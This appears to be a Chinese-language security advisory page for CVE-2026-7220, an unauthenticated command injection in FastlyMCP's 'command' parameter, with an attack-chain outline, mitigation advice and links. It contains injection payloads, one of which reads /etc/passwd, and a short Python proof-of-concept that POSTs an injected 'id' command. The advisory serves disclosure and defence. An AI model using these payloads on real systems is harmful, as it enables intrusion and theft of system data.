CVE-2026-7220 CVSS 7.3 高危

CVE-2026-7220 FastlyMCP OS命令注入漏洞

披露日期: 2026-04-28

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7220

漏洞类型

操作系统命令注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

jackwrichards FastlyMCP

漏洞概述

jackwrichards FastlyMCP 项目中的 fastly_cli 工具存在严重安全漏洞。该漏洞源于 `fastly-mcp.mjs` 文件未对传入的 `command` 参数进行有效过滤，导致攻击者可注入恶意操作系统命令。由于无需认证且无需用户交互，攻击者可远程利用此漏洞，导致系统机密性、完整性和可用性受损。目前利用代码已公开，厂商尚未修复。

技术细节

该漏洞位于 FastlyMCP 组件的 `fastly-mcp.mjs` 文件中，涉及对 `fastly_cli` 工具的调用。在处理用户提供的 `command` 参数时，程序直接将该参数拼接到系统命令上下文中执行，未进行严格的输入清洗或沙箱隔离。攻击者可以利用 Shell 元字符（如分号、管道符等）构造恶意 Payload。当受影响的应用处理该参数时，底层操作系统会解析并执行攻击者注入的任意命令。由于该组件采用滚动发布模式，受影响的具体版本号不明确，但直至特定 Commit (6f3d0b0e...) 的版本均受影响。攻击者可通过网络发起攻击，无需任何权限即可在服务器端执行代码。

攻击链分析

STEP 1

侦察

攻击者识别出目标系统正在使用 jackwrichards FastlyMCP 组件，并确定其版本受漏洞影响。

STEP 2

武器化

攻击者构造包含操作系统命令注入 Payload 的恶意数据，例如在 command 参数中追加 '; cat /etc/passwd'。

STEP 3

投递

攻击者通过网络向目标服务器发送包含恶意 command 参数的 HTTP 请求。

STEP 4

利用

目标服务器接收请求，解析 command 参数并拼接到系统命令中执行，导致攻击者的恶意代码在服务器端运行。

STEP 5

达成目标

攻击者成功获取系统敏感信息、修改系统文件或进一步控制服务器。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-7220
# Vulnerability: OS Command Injection in FastlyMCP

import requests

def exploit(target_url):
    # The vulnerable parameter is 'command'
    # Payload attempts to execute 'id' command on the target system
    payload = "original_cmd; id"
    
    # Prepare the data payload
    data = {
        "command": payload
    }
    
    try:
        print(f"[*] Sending payload to {target_url}...")
        response = requests.post(target_url, json=data, timeout=10)
        
        # Check if command injection indicators are present in response
        if response.status_code == 200 and ("uid=" in response.text or "gid=" in response.text):
            print("[+] Exploit successful! Command execution detected.")
            print("[+] Response body:")
            print(response.text)
        else:
            print("[-] Exploit failed or target not vulnerable.")
    except Exception as e:
        print(f"[!] An error occurred: {e}")

if __name__ == "__main__":
    # Replace with actual target endpoint
    target = "http://127.0.0.1:3000/fastly-endpoint"
    exploit(target)

影响范围

jackwrichards FastlyMCP <= commit 6f3d0b0e654fc51076badc7fa16c03c461f95620

防御指南

临时缓解措施

由于厂商尚未发布补丁，建议暂时禁用 FastlyMCP 组件或限制其对外暴露的接口。在生产环境中部署 Web 应用防火墙（WAF）规则，拦截包含常见命令注入特征符（如 ;, |, &, $, ` 等）的流量请求，以降低被攻击风险。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7220
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7220
3 Details https://www.cvedetails.com/cve/CVE-2026-7220/
4 VulDB https://vuldb.com/cve/CVE-2026-7220
5 Link https://github.com/jackwrichards/FastlyMCP/
6 Link https://github.com/jackwrichards/FastlyMCP/issues/3
7 Link https://vuldb.com/submit/802138
8 Link https://vuldb.com/vuln/359820
9 Link https://vuldb.com/vuln/359820/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表